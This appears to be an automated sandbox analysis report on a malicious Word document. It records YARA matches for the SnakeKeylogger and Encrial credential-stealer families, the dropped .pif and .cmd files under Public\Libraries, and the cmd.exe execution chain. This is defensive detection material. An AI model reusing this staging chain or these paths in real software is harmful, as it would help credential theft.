                  Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: Process Memory Space: jphwmyiA.pif PID: 7208, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: jphwmyiA.pif PID: 7820, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: jphwmyiA.pif PID: 8016, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, -j.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@24/10@5/6
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027B7F52 GetDiskFreeSpaceA,7_2_027B7F52
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,10_2_004019F0
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C6D48 CoCreateInstance,7_2_027C6D48
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,10_2_004019F0
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Desktop\~$T # KRPBV2663 .docJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_03
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{C8592FA1-DBA5-4FB7-B160-9F65D8E5C5DD} - OProcSessId.datJump to behavior
                  Source: ITT # KRPBV2663 .docOLE indicator, Word Document stream: true
                  Source: ITT # KRPBV2663 .docOLE document summary: title field not present or empty
                  Source: ITT # KRPBV2663 .docOLE document summary: edited time not present or 0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCommand line argument: 08A10_2_00413780
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCommand line argument: 08A15_2_00413780
                  Source: C:\Windows\SysWOW64\brightness.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: jphwmyiA.pif, 0000000A.00000003.2370715212.000000002225E000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2478621688.000000001D30F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2551268767.000000002391E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: ITT # KRPBV2663 .docReversingLabs: Detection: 47%
                  Source: ITT # KRPBV2663 .docVirustotal: Detection: 56%
                  Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\brightness.exe C:\Windows\SysWOW64\brightness.exe
                  Source: C:\Windows\SysWOW64\brightness.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\brightness.exeProcess created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif
                  Source: unknownProcess created: C:\Users\Public\Libraries\Aiymwhpj.PIF "C:\Users\Public\Libraries\Aiymwhpj.PIF"
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFProcess created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif
                  Source: unknownProcess created: C:\Users\Public\Libraries\Aiymwhpj.PIF "C:\Users\Public\Libraries\Aiymwhpj.PIF"
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFProcess created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\brightness.exe C:\Windows\SysWOW64\brightness.exeJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeProcess created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pifJump to behavior
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFProcess created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFProcess created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: url.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: smartscreenps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: winhttpcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ??????????.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ????.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ???e???????????.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ???e???????????.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: tquery.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: spp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: spp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: endpointdlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: endpointdlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: endpointdlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: endpointdlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: spp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppwmi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppcext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: winscard.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: version.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: dnsapi.dllJump to behavior
